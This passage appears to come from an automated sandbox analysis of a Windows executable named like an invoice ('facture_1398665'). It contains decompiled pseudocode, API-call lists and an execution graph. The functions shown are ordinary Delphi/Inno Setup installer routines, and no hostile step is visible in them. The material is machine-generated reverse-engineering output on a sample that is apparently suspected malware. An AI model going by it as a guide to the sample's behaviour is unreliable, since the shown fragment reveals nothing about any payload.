    									_v112664 = (_t211 & 0xfffffff0) - 4;
    									_t143 = E004025A0(_t148);
    									__eflags = _t143;
    									if(_t143 == 0) {
    										_v112645 = 0;
    										 *((intOrPtr*)(_t214 + _v112652 * 4 - 0x1f824)) = _v112664;
    										_t18 =  &_v112652;
    										 *_t18 = _v112652 + 1;
    										__eflags =  *_t18;
    									}
    								}
    							} else {
    								E004025F8(_t148, __eflags, _t214);
    							}
    						}
    						_t76 = E004021C0(_t148);
    						_t148 = _t76;
    						__eflags = _t148;
    					} while (_t148 != 0);
    					goto L11;
    				}
    				_t149 =  *0x415acc; // 0x7fe80000
    				while(_t149 != 0x415ac8 && _v112652 < 0x1000) {
    					_t76 = E004025A0(_t149 + 0x10);
    					__eflags = _t76;
    					if(_t76 == 0) {
    						_v112645 = 0;
    						_t76 = _v112652;
    						 *((intOrPtr*)(_t214 + _t76 * 4 - 0x1f824)) = ( *(_t149 + 0xc) & 0xfffffff0) - 0xfffffffffffffff4;
    						_t27 =  &_v112652;
    						 *_t27 = _v112652 + 1;
    						__eflags =  *_t27;
    					}
    					_t149 =  *((intOrPtr*)(_t149 + 4));
    				}
    				if(_v112645 != 0) {
    					L50:
    					return _t76;
    				}
    				_v112653 = 0;
    				_v112668 = 0;
    				_t79 =  *0x412038; // 0x40126c
    				_t151 = E0040237C(E00404914(_t79),  &_v161832);
    				_v112660 = 0x37;
    				_v112676 = 0x41205e;
    				_v112680 =  &_v110600;
    				do {
    					_v112672 = ( *_v112676 & 0x0000ffff) - 4;
    					_v112654 = 0;
    					_t199 = 0xff;
    					_t203 = _v112680;
    					while(_t151 <=  &_v131113) {
    						if( *_t203 > 0) {
    							if(_v112653 == 0) {
    								_t133 =  *0x41203c; // 0x401298
    								_t151 = E0040237C(E00404914(_t133), _t151);
    								_v112653 = 1;
    							}
    							if(_v112654 != 0) {
    								 *_t151 = 0x2c;
    								_t156 = _t151 + 1;
    								 *_t156 = 0x20;
    								_t157 = _t156 + 1;
    								__eflags = _t156 + 1;
    							} else {
    								 *_t151 = 0xd;
    								 *((char*)(_t151 + 1)) = 0xa;
    								_t164 = E00402260(_v112668 + 1, _t151 + 2);
    								 *_t164 = 0x20;
    								_t165 = _t164 + 1;
    								 *_t165 = 0x2d;
    								 *((char*)(_t165 + 1)) = 0x20;
    								_t128 = E00402260(_v112672, _t165 + 2);
    								_t129 =  *0x412044; // 0x401300
    								_t157 = E0040237C(E00404914(_t129), _t128);
    								_v112654 = 1;
    							}
    							_t106 = _t199 - 1;
    							_t228 = _t106;
    							if(_t228 < 0) {
    								_t107 =  *0x412048; // 0x40130c
    								_t158 = E0040237C(E00404914(_t107), _t157);
    							} else {
    								if(_t228 == 0) {
    									_t113 =  *0x41204c; // 0x401314
    									_t158 = E0040237C(E00404914(_t113), _t157);
    								} else {
    									if(_t106 == 1) {
    										_t118 =  *0x412050; // 0x401320
    										_t158 = E0040237C(E00404914(_t118), _t157);
    									} else {
    										_t158 = E00402394( *((intOrPtr*)(_t203 - 4)), _t157);
    									}
    								}
    							}
    							 *_t158 = 0x20;
    							_t159 = _t158 + 1;
    							 *_t159 = 0x78;
    							 *((char*)(_t159 + 1)) = 0x20;
    							_t151 = E00402260( *_t203, _t159 + 2);
    						}
    						_t199 = _t199 - 1;
    						_t203 = _t203 - 8;
    						if(_t199 != 0xffffffff) {
    							continue;
    						} else {
    							goto L39;
    						}
    					}
    					L39:
    					_v112668 = _v112672;
    					_v112680 = _v112680 + 0x800;
    					_v112676 =  &(_v112676[0x10]);
    					_t57 =  &_v112660;
    					 *_t57 = _v112660 - 1;
    				} while ( *_t57 != 0);
    				if(_v112652 <= 0) {
    					L49:
    					_t90 =  *0x412054; // 0x401330
    					E0040237C(E00404914(_t90), _t151);
    					_t94 =  *0x412058; // 0x401334
    					_t76 = MessageBoxA(0,  &_v161832, _t94, 0x2010);
    					goto L50;
    				}
    				if(_v112653 != 0) {
    					 *_t151 = 0xd;
    					_t153 = _t151 + 1;
    					 *_t153 = 0xa;
    					_t154 = _t153 + 1;
    					 *_t154 = 0xd;
    					_t155 = _t154 + 1;
    					 *_t155 = 0xa;
    					_t151 = _t155 + 1;
    				}
    				_t96 =  *0x412040; // 0x4012c0
    				_t151 = E0040237C(E00404914(_t96), _t151);
    				_t205 = _v112652 - 1;
    				if(_t205 >= 0) {
    					_t206 = _t205 + 1;
    					_t200 = 0;
    					_v112680 =  &_v129064;
    					L45:
    					L45:
    					if(_t200 != 0) {
    						 *_t151 = 0x2c;
    						_t152 = _t151 + 1;
    						 *_t152 = 0x20;
    						_t151 = _t152 + 1;
    					}
    					_t151 = E00402260( *_v112680, _t151);
    					if(_t151 >  &_v131113) {
    						goto L49;
    					}
    					_t200 = _t200 + 1;
    					_v112680 = _v112680 + 4;
    					_t206 = _t206 - 1;
    					if(_t206 != 0) {
    						goto L45;
    					}
    				}
    				L1:
    				_t215 = _t215 + 0xfffff004;
    				_push(_t70);
    				_t70 = _t70 - 1;
    				if(_t70 != 0) {
    					goto L1;
    				} else {
    					E00403250( &_v112644, 0x1b800);
    					E00403250( &_v129064, 0x4000);
    					_t76 = 0;
    					_v112652 = 0;
    					_v112645 = 1;
    					_t197 =  *0x413a28; // 0x1150000
    					goto L12;
    				}
    			}























































    0x004027bb
    0x004027bc
    0x004027bc
    0x00000000
    0x00402897
    0x00402817
    0x0040281c
    0x0040281e
    0x00402820
    0x00402894
    0x00402894
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00402822
    0x00402822
    0x00402827
    0x00402829
    0x0040282f
    0x00402831
    0x00402837
    0x00402844
    0x0040284e
    0x00402856
    0x0040285e
    0x00402863
    0x00402865
    0x00402867
    0x0040287a
    0x00402881
    0x00402881
    0x00402881
    0x00402881
    0x00402865
    0x00402839
    0x0040283c
    0x00402841
    0x00402837
    0x00402889
    0x0040288e
    0x00402890
    0x00402890
    0x00000000
    0x00402822
    0x004028a3
    0x004028e2
    0x004028b0
    0x004028b5
    0x004028b7
    0x004028b9
    0x004028cc
    0x004028d2
    0x004028d9
    0x004028d9
    0x004028d9
    0x004028d9
    0x004028df
    0x004028df
    0x004028fd
    0x00402b92
    0x00402b98
    0x00402b98
    0x00402903
    0x0040290c
    0x00402912
    0x0040292e
    0x00402930
    0x0040293a
    0x0040294a
    0x00402950
    0x0040295c
    0x00402962
    0x00402969
    0x00402974
    0x00402976
    0x00402987
    0x00402994
    0x00402996
    0x004029ae
    0x004029b0
    0x004029b0
    0x004029be
    0x00402a16
    0x00402a19
    0x00402a1a
    0x00402a1d
    0x00402a1d
    0x004029c0
    0x004029c0
    0x004029c4
    0x004029d6
    0x004029d8
    0x004029db
    0x004029dc
    0x004029e0
    0x004029ec
    0x004029f3
    0x00402a0b
    0x00402a0d
    0x00402a0d
    0x00402a20
    0x00402a20
    0x00402a23
    0x00402a2c
    0x00402a44
    0x00402a25
    0x00402a25
    0x00402a48
    0x00402a60
    0x00402a27
    0x00402a28
    0x00402a64
    0x00402a7c
    0x00402a2a
    0x00402a8a
    0x00402a8a
    0x00402a28
    0x00402a25
    0x00402a8c
    0x00402a8f
    0x00402a90
    0x00402a94
    0x00402aa1
    0x00402aa1
    0x00402aa3
    0x00402aa4
    0x00402aaa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00402aaa
    0x00402ab0
    0x00402ab6
    0x00402abc
    0x00402ac6
    0x00402acd
    0x00402acd
    0x00402acd
    0x00402ae0
    0x00402b61
    0x00402b61
    0x00402b74
    0x00402b7e
    0x00402b8d
    0x00000000
    0x00402b8d
    0x00402ae9
    0x00402aeb
    0x00402aee
    0x00402aef
    0x00402af2
    0x00402af3
    0x00402af6
    0x00402af7
    0x00402afa
    0x00402afa
    0x00402afb
    0x00402b13
    0x00402b1b
    0x00402b1e
    0x00402b20
    0x00402b21
    0x00402b29
    0x00000000
    0x00402b2f
    0x00402b31
    0x00402b33
    0x00402b36
    0x00402b37
    0x00402b3a
    0x00402b3a
    0x00402b4a
    0x00402b54
    0x00000000
    0x00000000
    0x00402b56
    0x00402b57
    0x00402b5e
    0x00402b5f
    0x00000000
    0x00000000
    0x00402b5f
    0x004027c1
    0x004027c1
    0x004027c7
    0x004027c8
    0x004027c9
    0x00000000
    0x004027cb
    0x004027e4
    0x004027f6
    0x004027fb
    0x004027fd
    0x00402803
    0x0040280a
    0x00000000
    0x0040280a

    APIs
    • MessageBoxA.USER32(00000000,?,00401334,00002010), ref: 00402B8D
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 48%
    			E00408F68(void* __ebx, void* __edi, void* __esi) {
    				int _v8;
    				signed int _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				void* _t53;
    				void* _t54;
    				intOrPtr _t80;
    				void* _t83;
    				void* _t84;
    				void* _t86;
    				void* _t87;
    				intOrPtr _t90;
    
    				_t89 = _t90;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(_t90);
    				_push(0x40907b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t90;
    				_v8 = GetThreadLocale();
    				_t53 = 1;
    				_t86 = 0x415b98;
    				_t83 = 0x415bc8;
    				do {
    					_t3 = _t53 + 0x44; // 0x45
    					E00408F2C(_t3 - 1, _t53 - 1,  &_v16, 0xb, _t89);
    					E00404C98(_t86, _v16);
    					_t6 = _t53 + 0x38; // 0x39
    					E00408F2C(_t6 - 1, _t53 - 1,  &_v20, 0xb, _t89);
    					E00404C98(_t83, _v20);
    					_t53 = _t53 + 1;
    					_t83 = _t83 + 4;
    					_t86 = _t86 + 4;
    				} while (_t53 != 0xd);
    				_t54 = 1;
    				_t87 = 0x415bf8;
    				_t84 = 0x415c14;
    				do {
    					_t8 = _t54 + 5; // 0x6
    					asm("cdq");
    					_v12 = _t8 % 7;
    					E00408F2C(_v12 + 0x31, _t54 - 1,  &_v24, 6, _t89);
    					E00404C98(_t87, _v24);
    					E00408F2C(_v12 + 0x2a, _t54 - 1,  &_v28, 6, _t89);
    					E00404C98(_t84, _v28);
    					_t54 = _t54 + 1;
    					_t84 = _t84 + 4;
    					_t87 = _t87 + 4;
    				} while (_t54 != 8);
    				_pop(_t80);
    				 *[fs:eax] = _t80;
    				_push(E00409082);
    				return L00404C90( &_v28, 4);
    			}

















    0x00408f69
    0x00408f6d
    0x00408f6e
    0x00408f6f
    0x00408f70
    0x00408f71
    0x00408f72
    0x00408f78
    0x00408f79
    0x00408f7e
    0x00408f81
    0x00408f89
    0x00408f8c
    0x00408f91
    0x00408f96
    0x00408f9b
    0x00408faa
    0x00408fae
    0x00408fb9
    0x00408fcd
    0x00408fd1
    0x00408fdc
    0x00408fe1
    0x00408fe2
    0x00408fe5
    0x00408fe8
    0x00408fed
    0x00408ff2
    0x00408ff7
    0x00408ffc
    0x00408ffc
    0x00409004
    0x00409007
    0x0040901f
    0x0040902a
    0x00409044
    0x0040904f
    0x00409054
    0x00409055
    0x00409058
    0x0040905b
    0x00409062
    0x00409065
    0x00409068
    0x0040907a

    APIs
    • GetThreadLocale.KERNEL32(00000000,0040907B,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00408F84
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 63%
    			E00409D3A(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				short _v558;
    				char _v564;
    				intOrPtr _v568;
    				char _v572;
    				char _v576;
    				char _v580;
    				intOrPtr _v584;
    				char _v588;
    				void* _v592;
    				char _v596;
    				char _v600;
    				char _v604;
    				char _v608;
    				intOrPtr _v612;
    				char _v616;
    				char _v620;
    				char _v624;
    				void* _v628;
    				char _v632;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v632 = 0;
    				_v596 = 0;
    				_v604 = 0;
    				_v600 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x409ef7);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffd8c;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x412c04; // 0x406bac
    					E004063E4(_t52,  &_v8);
    				} else {
    					_t86 =  *0x412c80; // 0x406ba4
    					E004063E4(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105) == 0) {
    					_v628 =  *(_t89 + 0xc);
    					_v624 = 5;
    					_v620 = _v8;
    					_v616 = 0x11;
    					_v612 = _t110;
    					_v608 = 5;
    					_push( &_v628);
    					_t60 =  *0x412c0c; // 0x406b4c
    					E004063E4(_t60,  &_v632, 2);
    					E00409860(_t89, _v632, 1, _t108, _t110);
    				} else {
    					_v592 =  *(_t89 + 0xc);
    					_v588 = 5;
    					E00404E50( &_v600, 0x105,  &_v558);
    					E00408028(_v600,  &_v596);
    					_v584 = _v596;
    					_v580 = 0x11;
    					_v576 = _v8;
    					_v572 = 0x11;
    					_v568 = _t110;
    					_v564 = 5;
    					_push( &_v592);
    					_t82 =  *0x412c38; // 0x406c1c
    					E004063E4(_t82,  &_v604, 3);
    					E00409860(_t89, _v604, 1, _t108, _t110);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E00409EFE);
    				L00404C88( &_v632);
    				L00404C90( &_v604, 3);
    				return L00404C88( &_v8);
    			}

































    0x00409d3a
    0x00409d49
    0x00409d4f
    0x00409d55
    0x00409d5b
    0x00409d61
    0x00409d66
    0x00409d67
    0x00409d6c
    0x00409d6f
    0x00409d75
    0x00409d7c
    0x00409d90
    0x00409d95
    0x00409d7e
    0x00409d81
    0x00409d86
    0x00409d86
    0x00409d9a
    0x00409da7
    0x00409db3
    0x00409e6f
    0x00409e75
    0x00409e7f
    0x00409e85
    0x00409e8c
    0x00409e92
    0x00409e9f
    0x00409ea8
    0x00409ead
    0x00409ebf
    0x00409dd6
    0x00409dd9
    0x00409ddf
    0x00409df7
    0x00409e08
    0x00409e13
    0x00409e19
    0x00409e23
    0x00409e29
    0x00409e30
    0x00409e36
    0x00409e43
    0x00409e4c
    0x00409e51
    0x00409e63
    0x00409e68
    0x00409ec8
    0x00409ecb
    0x00409ece
    0x00409ed9
    0x00409ee9
    0x00409ef6

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,00409EF7), ref: 00409DA7
    • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,00409EF7), ref: 00409DC9
      • Part of subcall function 004063E4: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 00406429
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 58%
    			E0040EE68(void* __ecx) {
    				char _v8;
    				intOrPtr _t17;
    				intOrPtr _t20;
    
    				_push(0);
    				_push(_t20);
    				 *[fs:eax] = _t20;
    				E00404CEC( &_v8, L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n\r\nFor more detailed information, please visit http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline",  *[fs:eax]);
    				MessageBoxW(0, E00404D24(_v8), L"Setup", 0x10);
    				_t17 = 0x40eeb5;
    				 *[fs:eax] = _t17;
    				_push(E0040EEBC);
    				return L00404C88( &_v8);
    			}






    0x0040ee6b
    0x0040ee6f
    0x0040ee78
    0x0040ee83
    0x0040ee9a
    0x0040eea1
    0x0040eea4
    0x0040eea7
    0x0040eeb4

    APIs
    • MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 0040EE9A
    Strings
    • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 0040EE7E
    • Setup, xrefs: 0040EE8A
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd
    C-Code - Quality: 100%
    			E0040ABF8() {
    				void* __ebx;
    				struct HINSTANCE__* _t1;
    				void* _t4;
    
    				_t1 = GetModuleHandleW(L"kernel32.dll");
    				_t3 = _t1;
    				if(_t1 != 0) {
    					_t1 = E00406728(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
    					 *0x412810 = _t1;
    				}
    				if( *0x412810 == 0) {
    					 *0x412810 = E00408068;
    					return E00408068;
    				}
    				return _t1;
    			}






    0x0040abfe
    0x0040ac03
    0x0040ac07
    0x0040ac0f
    0x0040ac14
    0x0040ac14
    0x0040ac20
    0x0040ac27
    0x00000000
    0x0040ac27
    0x0040ac2d

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,?,004115E0,00000000,004115F3), ref: 0040ABFE
      • Part of subcall function 00406728: GetProcAddress.KERNEL32(?,0040BDAE,00000000,0040678B,?,00000000,?,00000000,?,0040BCE6,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040674C
      • Part of subcall function 00406728: GetProcAddress.KERNEL32(?,00000000,00000000,0040678B,?,00000000,?,00000000,?,0040BCE6,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0040BDAE), ref: 0040676E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000001.12808788925.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000001.12808757994.00400000.00000002.sdmp
    • Associated: 00000002.00000001.12809054234.00412000.00000004.sdmp
    • Associated: 00000002.00000001.12809193738.00417000.00000004.sdmp
    • Associated: 00000002.00000001.12809202686.0041B000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_1_400000_facture_1398665.jbxd

    Execution Graph

    Execution Coverage:9.4%
    Dynamic/Decrypted Code Coverage:0%
    Signature Coverage:6%
    Total number of Nodes:2000
    Total number of Limit Nodes:105

    Graph

    execution_graph 73733 46006c 73734 460083 73733->73734 73735 460075 73733->73735 73737 45c458 73735->73737 73738 45c47f 73737->73738 73739 45c474 73737->73739 73738->73734 73741 460848 73739->73741 73742 460864 73741->73742 73743 4608aa 73741->73743 73746 460869 73742->73746 73747 46088d 73742->73747 73744 4608b2 73743->73744 73745 4608e0 73743->73745 73748 4608b8 73744->73748 73749 460cf4 73744->73749 73751 4608f6 73745->73751 73752 4608e8 73745->73752 73753 460c57 73746->73753 73754 46086f 73746->73754 73750 4609d8 73747->73750 73755 460888 73747->73755 73756 4608c7 73748->73756 73757 460a85 73748->73757 73774 460d08 73749->73774 73823 464fd8 73749->73823 73759 45c584 166 API calls 73750->73759 73751->73755 73788 460942 SetWindowPos 73751->73788 73752->73755 73828 45f6fc 52 API calls 73752->73828 73822 4606fc 170 API calls 73753->73822 73754->73755 73776 460cb6 GetCapture 73754->73776 73786 460a26 73755->73786 73799 45c584 73755->73799 73761 460a3d 73756->73761 73777 4608d3 73756->73777 73765 460c00 73757->73765 73818 457d94 8 API calls 73757->73818 73762 4609e3 73759->73762 73768 460a64 73761->73768 73769 460a54 73761->73769 73762->73786 73817 460590 170 API calls 73762->73817 73764 460c64 73764->73755 73778 460c6c 73764->73778 73821 460654 170 API calls 73765->73821 73772 45c458 166 API calls 73768->73772 73771 45c458 166 API calls 73769->73771 73770 460c0b 73770->73755 73775 460c13 73770->73775 73771->73755 73772->73755 73773 460d42 73773->73738 73774->73773 73779 464fd8 52 API calls 73774->73779 73775->73786 73790 460c4c DefWindowProcW 73775->73790 73776->73755 73780 460cc5 73776->73780 73777->73755 73784 45c458 166 API calls 73777->73784 73783 45c584 166 API calls 73778->73783 73778->73786 73779->73773 73780->73755 73785 45c458 166 API calls 73780->73785 73783->73786 73784->73755 73785->73755 73786->73738 73787 460abc 73794 460ad4 73787->73794 73819 45955c 170 API calls 73787->73819 73788->73755 73790->73786 73791 460bc1 73791->73765 73792 460be6 _TrackMouseEvent 73791->73792 73792->73765 73793 45c458 166 API calls 73795 460b4f 73793->73795 73794->73791 73794->73793 73794->73795 73797 460b64 73795->73797 73820 42af48 52 API calls 73795->73820 73797->73791 73798 45c458 166 API calls 73797->73798 73798->73791 73800 45c59a 73799->73800 73801 45c839 73800->73801 73804 45c62c 73800->73804 73809 45c7a4 73800->73809 73810 45c5e2 73800->73810 73801->73810 73853 45ac7c 170 API calls 73801->73853 73803 45c7c8 73807 45c7eb GetKeyboardState 73803->73807 73803->73810 73804->73803 73805 45c67d 73804->73805 73808 45c692 73804->73808 73804->73810 73851 47d3dc 170 API calls 73805->73851 73807->73809 73808->73810 73811 45c766 73808->73811 73809->73786 73810->73809 73829 476a78 73810->73829 73835 460084 73810->73835 73846 45fff8 73810->73846 73852 47d524 170 API calls 73811->73852 73813 45c779 73813->73810 73817->73786 73818->73787 73819->73794 73820->73797 73821->73770 73822->73764 73824 464fe4 73823->73824 73825 46501f 73824->73825 73826 423514 52 API calls 73824->73826 73827 464fd8 52 API calls 73824->73827 73825->73774 73826->73824 73827->73824 73828->73755 73830 476a87 73829->73830 73854 474a7c 73830->73854 73832 476a98 73833 476aa7 73832->73833 73886 47697c 10 API calls 73832->73886 73833->73809 73836 46009a 73835->73836 73837 464fd8 52 API calls 73836->73837 73838 4600a7 73837->73838 73845 45fff8 53 API calls 73838->73845 73966 475cd8 73838->73966 73839 4600c0 73985 460270 73839->73985 73841 4600c8 73842 464fd8 52 API calls 73841->73842 73843 4600df 73842->73843 73843->73809 73845->73839 73847 460063 73846->73847 73849 460009 73846->73849 73847->73809 73848 460037 EnumChildWindows 73848->73847 73849->73848 73850 423514 52 API calls 73849->73850 73850->73849 73851->73810 73852->73813 73853->73810 73855 474b10 73854->73855 73873 474aa0 73854->73873 73857 474b21 73855->73857 73895 452ec0 68 API calls 73855->73895 73858 474b61 73857->73858 73862 474bf9 73857->73862 73863 474b7c 73858->73863 73868 474bd4 73858->73868 73859 4796d4 52 API calls 73859->73873 73860 474c13 73861 474c25 73860->73861 73884 474bd2 73860->73884 73898 4749b4 63 API calls 73861->73898 73862->73860 73864 474c0d SetMenu 73862->73864 73863->73860 73876 474b9f GetMenu 73863->73876 73864->73860 73868->73860 73871 474be8 73868->73871 73869 474c2c 73870 474c7a 73869->73870 73877 474c54 SetWindowPos 73869->73877 73870->73832 73874 474bf1 SetMenu 73871->73874 73873->73855 73873->73859 73887 408d5c 73873->73887 73893 41196c 52 API calls 73873->73893 73894 404a74 12 API calls 73873->73894 73874->73860 73879 474bc2 73876->73879 73880 474ba9 73876->73880 73878 45c458 165 API calls 73877->73878 73881 474c6a 73878->73881 73896 452ec0 68 API calls 73879->73896 73885 474bbc SetMenu 73880->73885 73883 45c458 165 API calls 73881->73883 73883->73870 73884->73860 73897 4763fc 65 API calls 73884->73897 73885->73879 73886->73833 73888 408d64 73887->73888 73888->73888 73892 408db1 73888->73892 73899 408118 73888->73899 73892->73873 73893->73873 73895->73857 73896->73884 73897->73861 73898->73869 73900 40813d LoadStringW 73899->73900 73902 408127 73899->73902 73903 406584 73900->73903 73902->73900 73908 4080d0 73902->73908 73933 406ec0 73903->73933 73906 406594 73938 40527c 73906->73938 73909 4080e0 GetModuleFileNameW 73908->73909 73911 4080fc 73908->73911 73912 408370 GetModuleFileNameW RegOpenKeyExW 73909->73912 73911->73900 73913 4083b5 RegOpenKeyExW 73912->73913 73914 408413 73912->73914 73913->73914 73915 4083d3 RegOpenKeyExW 73913->73915 73932 408174 12 API calls 73914->73932 73915->73914 73917 4083f1 RegOpenKeyExW 73915->73917 73917->73914 73919 4084ab lstrcpynW GetThreadLocale GetLocaleInfoW 73917->73919 73918 408438 RegQueryValueExW 73920 408458 RegQueryValueExW 73918->73920 73921 408476 RegCloseKey 73918->73921 73920->73921 73921->73911 73932->73918 73934 406ef9 73933->73934 73935 406ec4 73933->73935 73934->73906 73935->73934 73942 403018 73935->73942 73937 406ed3 73937->73906 73939 405282 73938->73939 73941 40529d 73938->73941 73939->73941 73958 403034 73939->73958 73941->73892 73943 40301c 73942->73943 73943->73937 73944 403026 73943->73944 73945 40314d 73943->73945 73949 408f00 73943->73949 73944->73937 73957 40311c 12 API calls 73945->73957 73950 408f0f 73949->73950 73951 408f35 TlsGetValue 73949->73951 73950->73945 73952 408f1a 73951->73952 73967 475dfe 73966->73967 73971 475cf1 73966->73971 73968 45fff8 53 API calls 73967->73968 73970 475e06 73968->73970 73969 475dd1 GetCurrentThreadId EnumThreadWindows 73969->73967 73970->73839 73971->73969 73972 475d21 73971->73972 73973 475d4d 73972->73973 73993 423514 73972->73993 73974 423514 52 API calls 73973->73974 73977 475d6c 73974->73977 73979 423514 52 API calls 73977->73979 73978 464fd8 52 API calls 73978->73973 73980 475d87 73979->73980 73981 475dbd 73980->73981 73982 423514 52 API calls 73980->73982 73981->73839 73983 475db6 73982->73983 73984 464fd8 52 API calls 73983->73984 73984->73981 73986 46027e 73985->73986 73987 460306 73986->73987 73989 460289 73986->73989 73988 460331 73987->73988 73998 460110 73987->73998 73988->73841 73989->73988 73990 45c458 170 API calls 73989->73990 73991 4602dc 73990->73991 73991->73841 73994 42351e 73993->73994 73995 423532 73994->73995 73997 4234a0 52 API calls 73994->73997 73995->73978 73997->73995 73999 460125 73998->73999 74001 4601bb 73999->74001 74004 423514 52 API calls 73999->74004 74005 460110 170 API calls 73999->74005 74000 460269 74000->73988 74001->74000 74002 45c458 170 API calls 74001->74002 74003 460222 74002->74003 74003->73988 74004->73999 74005->73999 74008 4736f8 74009 473712 74008->74009 74010 47373e 74008->74010 74012 473714 74009->74012 74019 47376e 74009->74019 74011 473bfc 74010->74011 74017 47374d 74010->74017 74089 478b00 18 API calls 74011->74089 74013 473720 74012->74013 74014 473801 74012->74014 74016 473729 74013->74016 74023 4739cd 74013->74023 74018 4737fc 74014->74018 74025 473832 74014->74025 74034 4738fe 74014->74034 74048 47384f 74014->74048 74020 473730 74016->74020 74027 473ace 74016->74027 74017->74020 74021 47387b 74017->74021 74017->74034 74024 4737c2 74019->74024 74019->74034 74033 45c458 170 